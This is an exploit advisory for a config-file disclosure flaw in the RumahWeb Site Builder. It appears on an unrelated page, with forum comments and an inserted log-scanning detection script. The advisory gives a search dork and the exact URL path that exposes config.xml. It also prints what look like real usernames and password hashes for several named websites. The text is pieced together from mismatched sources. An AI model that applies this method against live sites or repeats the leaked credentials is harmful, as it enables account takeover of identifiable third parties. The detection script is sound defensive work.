EDDY PHONES CELLULAR


Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 December 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb

Proof of Concept
================
[!] site/data/config/config.xml
For example, if a Google search returns the result www.kratontour.com/admin,
change the URL to www.kratontour.com/data/config/config.xml

-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or, if the result is toyohashi-mosque.org/admin, change the URL to toyohashi-mosque.org/data/config/config.xml


Example :
More results? http://pastebin.com/4VZpiC7e

Source : http://go.girilaya.com/0l0qwm

GIRILAYA Member
Learning By DOING
http://blog.girilaya.com/
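
A detection check for the exposure described above, as an added example that is not part of the original advisory or the forum posts: it scans web server access logs, assumed to be in Apache/Nginx combined format, for successful responses to XML files under /data/config/. The function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

# Combined/common log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Any XML file directly under /data/config/ (config.xml, template.xml, ...).
SENSITIVE_RE = re.compile(r'^/data/config/[^/]+\.xml$', re.IGNORECASE)


def canonical_path(target):
    """Drop the query string, URL-decode and normalise the request path."""
    path = unquote(target.split('?', 1)[0])
    return normpath('/' + path.lstrip('/'))


def find_disclosures(lines):
    """Return {client_ip: [(timestamp, path), ...]} for served config files."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        path = canonical_path(m['target'])
        # Only a 2xx response means the file content actually left the server.
        if SENSITIVE_RE.match(path) and m['status'].startswith('2'):
            hits[m['ip']].append((m['ts'], path))
    return dict(hits)


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Dec/2012:10:01:02 +0700] "GET /data/config/config.xml HTTP/1.1" 200 142 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Dec/2012:10:01:09 +0700] "GET /data//config/./template.xml HTTP/1.1" 200 388 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Dec/2012:10:03:00 +0700] "GET /data/config/config.xml HTTP/1.1" 403 199 "-" "curl/7.28"',
    '203.0.113.20 - - [08/Dec/2012:10:04:00 +0700] "GET /DATA/config/%63onfig.xml?x=1 HTTP/1.1" 200 142 "-" "-"',
    '203.0.113.30 - - [08/Dec/2012:10:05:00 +0700] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == '__main__':
    for ip, events in find_disclosures(SAMPLE_LOG).items():
        print(ip, events)
```

Any hit means the stored username and password hash should be treated as disclosed and rotated; a 403 or 404 on the same path shows the file is no longer being served.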

<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>

For those of you who are already using this SiteBuilder... don't worry and don't underestimate it just yet... we can also patch it, by deleting the Template and deleting the template.xml located at /data/config/template.xml.

The example sites above can be viewed because they were only just created and their Template has not been deleted yet.

<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>

<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>
